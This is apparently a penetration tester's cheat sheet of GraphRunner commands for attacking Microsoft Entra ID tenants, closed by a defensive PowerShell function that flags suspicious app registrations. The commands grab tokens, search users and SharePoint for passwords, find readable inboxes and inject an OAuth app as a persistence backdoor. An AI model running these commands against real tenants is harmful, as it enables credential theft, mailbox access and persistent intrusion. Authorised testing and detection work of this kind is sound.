# GraphRunner
Awesome tool for enumerating/attacking Azure.  [This page](https://github.com/dafthack/GraphRunner/wiki/Potential-Attack-Path-Examples) has some practical attacks.  And [this blog](https://mturhanlar.medium.com/microsoft-entra-id-azure-ad-penetration-test-red-team-assessment-all-in-one-tool-a74fe7b3c4c1) had some nice tips as well.  I also enjoyed [this presentation](https://www.first.org/resources/papers/amsterdam24/Stoner-Herrald-Google-2024FIRST-TC-GraphRunner.pdf).  Also I just saw this [GraphRunner cheatsheet](https://www.blackhillsinfosec.com/graphrunner-cheatsheet/) updated in August of 2025!

## Authenticate
```
get-graphtokens
```

## Get your tenantid
```
get-tenantid -domain yourdomain.com
```

## Get your own info (like your `id`)
```
$headers = @{Authorization = "Bearer $($tokens.access_token)"}
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers $headers | 
    Select-Object displayName, id, userPrincipalName
```

## Grab access token to clipboard
```
# Uses the same $tokens variable as the rest of this page
$tokens | Select-Object -ExpandProperty access_token | Set-Clipboard
```

## Enumerate ALL the permissions
```
Invoke-BruteClientIDAccess -domain example.com -refreshToken $tokens.refresh_token
```

## Run the kitchen sink and GraphRun all the things!
```
invoke-graphrunner -tokens $tokens
```

## Run with specific tests disabled
```
Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams
```

## Dump conditional access policies
```
invoke-dumpcaps -tokens $tokens -resolveguids
```

## Get users with the word "password" in their descriptions
```
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"
```

## Get ALL users
```
get-azureadusers -tokens $tokens -outfile users.txt
```

### See if you can read any inboxes of those users
```
Invoke-GraphOpenInboxFinder -tokens $tokens -userlist .\users.txt
```

## Get groups / updatable groups / dynamic groups
```
Get-SecurityGroups -Tokens $tokens -OutputFile groups.txt
```
```
Get-UpdatableGroups -Tokens $tokens
```
```
Get-DynamicGroups -Tokens $tokens
```

## Get SharePoint URLs
```
Get-SharePointSiteURLs -Tokens $tokens
```

## Find interesting SharePoint/OneDrive files
For example, those containing the word "password":

```
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password" -OutFile sharepoint-password-search
```

## "Inject" a trustworthy app for persistence
```
Invoke-InjectOAuthApp -AppName "Test App September 2025" -ReplyUrl "http://testing123" -scope "op backdoor" -Tokens $tokens
```
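
From the defender's side, an app registered this way leaves an application object that can be audited. The following is an added example, not part of GraphRunner or the linked pages: `Find-SuspectAppRegistration`, its thresholds, and the sample objects are hypothetical and constructed, shaped like results from the Graph `/v1.0/applications` endpoint.

```powershell
# Added example, not GraphRunner code. Function name and thresholds are assumptions.
function Find-SuspectAppRegistration {
    param(
        [Parameter(Mandatory)] [object[]] $Applications,  # objects shaped like /v1.0/applications results
        [int] $RecentDays = 30,
        [datetime] $Now = (Get-Date)
    )
    foreach ($app in $Applications) {
        $reasons = @()
        # Reply URLs over plain HTTP that are not loopback, like the http://testing123 value above
        $badUrls = @($app.web.redirectUris | Where-Object {
            $_ -match '^http://' -and $_ -notmatch '^http://(localhost|127\.0\.0\.1)([:/]|$)'
        })
        if ($badUrls.Count -gt 0) { $reasons += "non-loopback http reply URL: $($badUrls -join ', ')" }
        # Recently registered apps are worth a review by whoever owns app governance
        $created = [datetime]$app.createdDateTime
        if (($Now - $created).TotalDays -le $RecentDays) { $reasons += "created $($created.ToString('yyyy-MM-dd'))" }
        # Count delegated ("Scope") permissions requested across all resources
        $scopes = @($app.requiredResourceAccess.resourceAccess | Where-Object { $_.type -eq 'Scope' })
        if ($scopes.Count -ge 5) { $reasons += "$($scopes.Count) delegated permissions requested" }
        # Require two independent signals to keep noise down
        if ($reasons.Count -ge 2) {
            [pscustomobject]@{ DisplayName = $app.displayName; AppId = $app.appId; Reasons = $reasons -join '; ' }
        }
    }
}

# Constructed sample data (placeholder IDs); in practice pass the 'value' array returned by the endpoint
$sample = @(
    [pscustomobject]@{
        displayName = 'Test App September 2025'; appId = '00000000-0000-0000-0000-000000000001'
        createdDateTime = '2025-09-02T10:15:00Z'
        web = [pscustomobject]@{ redirectUris = @('http://testing123') }
        requiredResourceAccess = @([pscustomobject]@{
            resourceAppId  = '00000003-0000-0000-c000-000000000000'   # Microsoft Graph
            resourceAccess = 1..6 | ForEach-Object { [pscustomobject]@{ id = "placeholder-$_"; type = 'Scope' } }
        })
    },
    [pscustomobject]@{
        displayName = 'Payroll Portal'; appId = '00000000-0000-0000-0000-000000000002'
        createdDateTime = '2023-01-15T08:00:00Z'
        web = [pscustomobject]@{ redirectUris = @('https://payroll.example.com/signin-oidc') }
        requiredResourceAccess = @([pscustomobject]@{
            resourceAppId  = '00000003-0000-0000-c000-000000000000'
            resourceAccess = @([pscustomobject]@{ id = 'placeholder-1'; type = 'Scope' })
        })
    }
)
Find-SuspectAppRegistration -Applications $sample -Now ([datetime]'2025-09-10') | Format-List
```

Only the first sample object is reported; the second has an HTTPS reply URL, an old creation date, and a single delegated permission.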
